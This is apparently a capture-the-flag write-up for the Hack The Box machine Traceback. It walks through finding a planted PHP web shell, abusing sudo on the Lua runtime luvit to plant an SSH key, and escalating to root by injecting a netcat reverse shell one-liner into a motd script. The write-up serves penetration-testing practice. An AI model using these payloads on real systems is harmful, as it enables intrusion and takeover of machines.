Started the box by enumerating services on the machine using nmap. Nmap scan returned http and ssh services which weren't that interesting.
# Nmap 7.80 scan initiated Wed May 20 06:40:09 2020 as: nmap -sV -sT -oN nmap 10.10.10.181
Nmap scan report for 10.10.10.181
Host is up (0.094s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 20 06:40:21 2020 -- 1 IP address (1 host up) scanned in 11.59 seconds
Going to http://10.10.10.181, the website had already been owned by Xh4H and the hacker claims to have left a backdoor somewhere.
Running directory bruteforcing using Daniel Miessler's wordlists returned zero results. However, upon checking the page source, there's a comment saying "Some of the best web shells that you might need". Throwing that string into Google took me to a Github repo https://github.com/TheBinitGhimire/Web-Shells.
Going through the list of backdoors, http://10.10.10.181/smevk.php returned a HTTP 200 OK. Using the default credentials admin:admin, I was able to gain access to the webshell.
The webshell's interface was really ugly, but it was sufficient to do some basic enumeration.
# Determine user
$ whoami
webadmin
# Check home directory
$ ls -a /home/webadmin
. .. .bash_history .bash_logout .bashrc .cache .local .luvit_history .profile .ssh note.txt
# Read note.txt
$ cat /home/webadmin/note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
# List user privileges
$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
Looking through the results, it seems /home/sysadmin/luvit can be executed as the user sysadmin without authentication.
I had never written a single line of Lua code before and after doing some googling it seems that Luvit is a runtime environment for Lua.
Reading through the documentation I tried to craft some lua payload which will be executed as sysadmin.
The following lua code lists files in /home/sysadmin
directory='/home/sysadmin/'
pfile = io.popen('ls -a "'..directory..'"')
for filename in pfile:lines() do
print(filename)
end
To execute this piece of code, I simply had to write this code somewhere on the box and run it using luvit. To do so, I echoed my code to /tmp/ on the box and ran it.
$ echo "directory='/home/sysadmin/';pfile = io.popen('ls -a \\"'..directory..'\\"');for filename in pfile:lines() do;print(filename);end" > /tmp/listdir.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/listdir.lua
. .. .bash_history .bash_logout .bashrc .cache .local .profile .ssh luvit user.txt
Modifying the payload to print /home/sysadmin/user.txt, I got my first flag.
$ echo "pfile = io.popen('cat /home/sysadmin/user.txt');for filename in pfile:lines() do;print(filename);end" > /tmp/getflag.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/getflag.lua
{{FLAG}}
Enumerating through sysadmin's home folder, I found the .ssh folder with the authorized_keys file. Adding my public key to this file should grant me ssh access as sysadmin to the box.
Using ssh-keygen, I created a new ssh keypair. The payload adds my public key to the list of authorized keys.
$ echo "io.popen(\\"echo '{{PUBLIC KEY}}' >> /home/sysadmin/.ssh/authorized_keys\\")" > /tmp/ssh.lua
$ sudo -u sysadmin /home/sysadmin/luvit /tmp/ssh.lua
Ssh-ed into the box using ssh -i PRIVATE_KEY sysadmin@10.10.10.181 and I was greeted by a message from Xh4h and a shell.
➜ ~ ssh -i PRIVATE_KEY sysadmin@10.10.10.181
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
$
Trying to privilege escalate from sysadmin to root was kinda tricky. I tried looking for files with incorrect permisions or suid binaries but found nothing. However looking through the list of processes using ps -aux, there was a command being executed as root that seemed to be running at intervals.
root 3851 0.0 0.0 4628 772 ? Ss 19:15 0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
The command seems to be restoring a backup of the message of the day (motd), which is a service that can be used to print custom greeting messages upon login - similar to the greeting from Xh4h upon ssh-ing into the box.
Looking through /etc/update-motd.d/, there were several messages and the first one /etc/update-motd.d/00-header contained echo "\nWelcome to Xh4H land \n", which was the greeting upon logging into the box. This could be abused by adding commands to run upon login, which will be run as root.
I set up a reverse shell listener on port 1337 on my local machine. Afterwards, I edited /etc/update-motd.d/00-header to set up a netcat reverse shell connector.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {{ipaddr}} 1337 >/tmp/f; echo "\nWelcome to Xh4Hland \n"
In a different window, ssh into the box and monitor the reverse shell listener. Note that it may require a few tries since the motd gets overwritten every 30 seconds. If timed correctly you should have access to the root shell. Navigate to /root to grab the root flag.
$ cat /root/root.txt
{{FLAG}}